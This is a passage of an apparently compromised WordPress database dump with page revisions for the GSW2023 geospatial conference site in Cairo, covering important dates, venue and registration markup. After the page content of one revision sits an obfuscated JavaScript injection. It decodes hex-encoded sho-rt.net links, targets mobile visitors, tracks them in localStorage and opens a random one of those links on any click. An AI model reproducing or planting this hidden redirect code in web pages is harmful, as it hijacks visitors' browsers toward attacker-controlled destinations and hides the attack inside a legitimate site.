content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675475978120{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-02-04 02:03:59','2023-02-04 02:03:59','',3066,'https://gsw2023.com/?p=3735',0,'revision','',0),
(3736,1,'2023-02-04 02:06:53','2023-02-04 02:06:53','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5><strong>SUBMITION FOR ABSTRACT AND FULL PAPER OPEN NOW</strong></h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 